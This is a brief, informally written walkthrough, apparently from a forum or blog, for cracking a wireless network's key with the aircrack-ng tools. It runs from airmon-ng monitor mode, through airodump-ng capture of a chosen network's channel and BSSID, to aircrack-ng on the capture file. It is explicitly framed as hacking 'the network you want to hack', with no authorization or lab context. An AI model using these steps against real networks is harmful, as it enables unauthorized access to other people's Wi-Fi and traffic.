airmon-ng (monitors the wireless cards or network cards) airmon-ng start wlan0/lan0 (use either wlan0 or lan0 which is shown after monitoring) airodump-ng mon0 (dumps the wireless cards to mon0) .... .... .... ....(HERE YOU WILL SEE THE LOTS OF NETWORKS FLUCTUATING) ... ... ... ..... ..... airodump-ng -c(channel no.) --bssid (Bssid) -w (file name) mon0 (here you must enter channel no. , bssid, of the network you want to hack broadcasted above)(you can use any file name but keep in mind you need that later to crack) {now data starts being captured by your wireless network. after data reaches minimum 15000 ,type following code in new konsole} aircrack-ng (filename-01.cap} using certain algorithm you will get the key...